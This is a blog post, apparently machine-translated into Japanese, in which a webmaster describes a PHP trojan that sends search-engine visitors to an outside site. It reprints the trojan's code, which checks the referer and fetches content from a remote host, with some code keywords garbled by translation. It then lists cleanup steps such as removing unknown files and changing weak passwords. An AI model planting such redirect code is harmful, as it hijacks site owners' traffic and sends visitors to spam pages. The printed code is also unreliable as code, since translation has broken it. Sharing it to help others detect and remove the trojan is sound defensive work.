検索エンジンのトラフィックを迂回させる PHP トロイの木馬の導入と防止

検索エンジンのトラフィックを迂回させる PHP トロイの木馬の導入と防止

普段はアクセス数が多くPVも高いWebサイトなのに、ある日突然PVが下がり始めたら、Webサイトのコンテンツに問題があるだけでなく、トロイの木馬に感染していないか検討する必要があります。実際、検索エンジンのトラフィックを迂回させるPHPトロイの木馬は以前からありました。簡単に言うと、アクセストラフィックが検索エンジンから来ている場合、相手方のWebサイトのファイルを自動的に取得し、ユーザーに自分のWebサイトが見られないようにするのです。

私のウェブサイトが最近このような攻撃を受けたため、このコードを共有して、このような攻撃に対して依然として警戒する必要があるウェブマスター、特に PHP プログラムを使用してウェブサイトを構築している方々に何らかのインスピレーションを与えたいと考えています。過去のデータによると、このようなトロイの木馬は珍しいものではありません。1年前、あるいは数年前にも存在していたようですが、現在その影響は以前ほど大きくないかもしれません。

以下は、検索エンジンのトラフィックを転送する攻撃コードです。

エラー報告(E_ERROR);

ヘッダー('content-Type: text/html; charset=gb2312');

$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$referer = Split("#",$come_from);

foreach($referer を $v として){

if(strstr($_SERVER['HTTP_REFERER'],$v))

{

ヘッダー("場所: ".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('http://www.abc.com//xx/dn2.php');

?>

コードは非常にシンプルです。アクセス元が検索エンジンの場合、以下に説明する PHP ファイルと HTML ファイルを配置するため、ユーザーが期待する結果が得られません。もちろん、サーバーごとに設定は異なり、そのようなファイルをアップロードしても実行が制限されるサーバーもありますが、問題があるので、それを解決するのが次のステップです。

以下では私の解決策について簡単に説明します。今後同様の状況に遭遇する他の人に役立つことを願っています。

最初のステップは、当然ながら、類似の PHP ファイルを削除することです。これらの PHP ファイルには固定の名前はありませんが、すべてルート ディレクトリにあるため、簡単に見つけることができます。見慣れないファイルを削除するだけです。削除した後は興奮しないでください。まず他のディレクトリに移動して、類似した見慣れないファイルを探してください。見つかった見慣れないファイルを開いて、問題がある場合は直接削除してください。

2 番目のステップは、よく使用されるシステム PHP ファイルを引き続き調べて、これらのファイルが最近変更されたかどうかを確認することです。変更されている場合は、それらをダウンロードし、最初に表示された dv.php など、以前に表示された奇妙な PHP ファイル名を探します。これで、dv.php を検索して、このように変更されたかどうかを確認できます。また、他のディレクトリには通常、実際のトロイの木馬があります。

3番目のステップでは、360ウェブサイトセキュリティテストプラットフォームにアクセスできます。アップロードされたファイルが検証されたら、ウェブサイトが安全かどうかのテストを開始できます。一般的に、ウェブサイトが黒いリンクにリンクされている場合、または目に見えないテキストがある場合は、プロンプトが表示されるため、比較的簡単に使用できます。この機能は、ブラックリンクの検出に特に適しています。ブラックリンクは一般に隠されており、ウェブマスターが考え出すのが難しいためです。

4 番目のステップは、FTP アカウントのパスワード、Web サイトのバックエンド アドレス、Web サイトのバックエンド ログイン名、またはその他のパスワードなど、弱いパスワードを変更することです。7 文字または 8 文字のみなど、パスワードが弱すぎると思われる場合は、より難しいパスワードに変更することをお勧めします。弱いパスワードがスキャンされたために、多くの Web サイトがクラックされています。パスワードの長さを増やすことは、そのような Web サイトのクラックを防ぐのに役立ちます。

ここまで書いて、話は基本的に終わりです。ウェブサイトのセキュリティは緊急です。ウェブサイトのセキュリティ問題には常に注意を払う必要があります。注意を払わないと、ブラックリンクを張っている人たちがあなたを狙うでしょう。ウェブサイトのセキュリティを常に向上させることによってのみ、ハッキングを回避することができます。この記事は、Aibue.com (http://www.aibue.com) のウェブマスターによって作成されたものです。転載または共有する場合は、出典を明記してください。ご協力ありがとうございます。

原題: 検索エンジンのトラフィックを迂回させる PHP トロイの木馬の紹介と防止

キーワード: 検索エンジン、php トロイの木馬、dedecms、phpcm、ウェブマスター、ウェブサイト、ウェブサイトのプロモーション、収益化

<<:  ウェブサイトのナビゲーションを適切に最適化すると、SEOの最適化が容易になります。

>>:  オンラインプロモーションの目的は、ブランド構築に重点を置き、ユーザーの参加を増やすことです。

推薦する

毎日の話題: 中央銀行がビットコインを規制、多くのウェブサイトがビットコインによる支払いの受け入れを停止

A5ウェブマスターネットワーク(www.admin5.com)は12月11日、中国人民銀行が工業情報...

ユーザー分析:多肢選択式質問を用いた情報注目度調査の事例分析

特定のページを閲覧しているユーザーが何を見ているのかを知りたい場合、通常は以下の方法があります。1....

Green Radish アルゴリズム後のウェブサイトフレンドリーなリンク交換基準

Green Radish Algorithm のリリース後、多くのウェブサイトが格下げされたり、K ...

春から冬まで、電子商取引:儲かりながらも損失も

写真/CFP長い準備期間を経て、電子商取引は「お金を燃やして」繁栄したが、利益が出ないという恥ずかし...

ブラック 5 プロモーション: HawkHost - 80% オフ/仮想ホスティング/VPS/ドメイン登録

Eagle Hosting は、ブラック フライデーの期間中も間違いなく見逃せません。ドメイン名登録...

Kubernetes: 開発者も理解する必要がある運用と保守の知識

この記事はWeChatの公開アカウント「Java Art」から転載したものです。この記事を転載する場...

fdcservers 月額 9 ドル / 384 MB RAM / 50 GB HDD / 5 IP / 5 MB 無制限 / xen / onapp 6 つのデータセンター

ちょっと眠いので、寝る前に FDC に関するニュースをいくつかお伝えしたいと思います。FDC は大手...

Toutiaoが「検索」市場に参入するのは遅すぎますか?

今から検索製品を開発するのは遅すぎますか? 「今こそ新たなチャンスが訪れる時であり、新しい形の検索エ...

8868 Ji Shang: どのようにして月間売上高が数千万に達するモバイルゲーム取引プラットフォームになったのでしょうか?

彼はモバイルインターネット分野の最年少世代の起業家です。 2012年、彼はUCゲームセンターの事業部...

ソフト記事シリーズを継続的に更新してうまくやっていく方法

コンテンツ編集は、詩、散文、議論文など、さまざまな形式、または任意の形式を取ることができます。ソフト...

電子商取引ウェブサイトの巧妙な設定、開発、アップグレードは、優れた方法と切り離せない

今日の数多くのウェブサイトの中には、雨後の筍のように次々と出現する電子商取引ウェブサイトが数多くあり...

Shumai Technology: 香港の物理サーバー、最低350元、30M CMIまたは10M cn2、無制限のトラフィック

Shumai Technology は 5 月に、香港の自社データセンターにある香港サーバーを超低価...

動画検索エンジンがより正確になる時代を期待

2007年、ビデオ検索エンジンはインターネット上で話題になりました。インターネットと帯域幅の発展に伴...

クラウドネイティブセキュリティに関する3つの誤解を解く

多くの組織が積極的にクラウドを導入していることは明らかです。しかし、疑問は、彼らがクラウドを完全に理...